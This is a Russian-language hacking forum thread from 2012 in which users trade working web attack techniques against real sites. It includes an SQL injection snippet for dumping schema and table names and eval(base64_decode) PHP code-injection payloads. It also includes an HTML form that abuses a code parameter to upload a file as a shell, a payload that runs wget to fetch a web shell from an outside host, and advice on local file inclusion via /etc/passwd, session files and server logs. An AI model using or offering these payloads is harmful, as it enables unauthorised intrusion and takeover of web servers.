Старый 13.01.2012, 18:15   #1611
ForeverFree
 
Регистрация: 11.10.2011
Сообщений: 24
Репутация: 0
По умолчанию

Код:
INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble_Name)
(c) mohZe
ForeverFree вне форума   Ответить с цитированием
Старый 13.01.2012, 18:19   #1612
pinch
 
Регистрация: 02.11.2010
Сообщений: 20
Репутация: 2
По умолчанию ok

Цитата:
Сообщение от ForeverFree Посмотреть сообщение
Код:
INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble_Name)
(c) mohZe
ok пашет
pinch вне форума   Ответить с цитированием
Старый 14.01.2012, 16:36   #1613
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Прочитал через скуль /etc/httpd/conf/httpd.conf
В нем как всегда
Include conf.d/*.conf
Вообщем можно в каком-нить логе глянуть какие файлы там инклудятся??? А то угадать не получилось (vhosts,hosts,домены)
dumb вне форума   Ответить с цитированием
Старый 14.01.2012, 16:49   #1614
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script Посмотреть сообщение
Вернемся к base64_decode. Даже если бы без кавычек этот код мог сработать, то никак не в том виде, в котором его написал dumb.
1) Функция base64_decode() выполнится eval'ом и вернет строку. Дальше не произойдет ничего.
Чтобы выполнить код внутри base64_decode(), нужно передавать "code=eval(base64_decode(...));"
2) Код, зашифрованный в base64

Без ; в конце не выполнится. (или выполнится?)



Не получилось

?c=eval(base64_decode('ZWNobygndGVzdCcpOw==')); - работает
?c=eval(base64_decode(ZWNobygndGVzdCcpOw==)); - не работает

Или имелось ввиду что-то подобное?
?d=ZWNobygndGVzdCcpOw==&c=eval(base64_decode($_GET[d]));



dumb, кидай в ПМ
А если выходит вот такая ошибка?
Код:
Parse error</b>:  syntax error, unexpected $end in <b>/sites/site.ru/forum/cache/skin_cache/cacheid_2/skin_global.php(339) : eval()'d code</b> on line <b>1
Пробовал заливать по разному, также пробовал:
Код:
<form action="http://site.ru/index.php?testKey=123&code=copy($_FILES[file][tmp_name],$_GET[bob]);end;&bob=/sites/site.ru/forum/22.php" method="post" enctype="multipart/form-data">
 <input type="file" name="file">
 <input type="submit" value="upload">
 </form>
z0mbie вне форума   Ответить с цитированием
Старый 14.01.2012, 17:24   #1615
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

copy($_FILES[file][tmp_name],$_GET[bob]);end;
что это (выделено красным)?
M_script вне форума   Ответить с цитированием
Старый 14.01.2012, 17:28   #1616
+toxa+
 
Аватар для +toxa+
 
Регистрация: 20.07.2010
Сообщений: 4
Репутация: 3
По умолчанию

Цитата:
?c=eval(base64_decode('ZWNobygndGVzdCcpOw==')); - работает
?c=eval(base64_decode(ZWNobygndGVzdCcpOw==)); - не работает
в данном случае спасает замена "==" на "Ag". два пробела в конце кодеса ничего не меняют. и работает без ковычек.
+toxa+ вне форума   Ответить с цитированием
Старый 14.01.2012, 17:38   #1617
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

+toxa+, немного опоздал =)
https://rdot.org/forum/showpost.php?p=23057&postcount=1753
M_script вне форума   Ответить с цитированием
Старый 14.01.2012, 18:07   #1618
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script Посмотреть сообщение
copy($_FILES[file][tmp_name],$_GET[bob]);end;
что это (выделено красным)?
Раньше работал код без кодировки и т.п.:
Код:
index.php?testKey=123&code=print(`wget%20-O%20sss.php%20http://ссылка_на_шелл/шелл.txt;ls%20-ls`);exit;
Щас же он не работает
z0mbie вне форума   Ответить с цитированием
Старый 14.01.2012, 22:57   #1619
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

А во фре как быть с инклудом? Тут https://rdot.org/forum/showthread.php?t=343 ток видна с линуксом.
У меня так что mq=on, и include(papka/ . $_GET['file'] . ".php");
То бишь нулл-байт я отрезал так //////[..]///// (это понятно). Сиссии в /tmp/sess_MYID я не нашел, процессы тоже. Проинклудил ток /etc/passwd и хтаксес (дира выше).
dumb вне форума   Ответить с цитированием
Старый 15.01.2012, 10:24   #1620
wwwMedic
 
Регистрация: 13.09.2011
Сообщений: 27
Репутация: 10
По умолчанию

поищи phpinfo, там во-первых найдешь путь к файлам сессий, во-вторых поищи тут темку, c помощью phpinfo тоже можно проводить инклуд
либо ищи логи вебсервера и инклудь их
wwwMedic вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot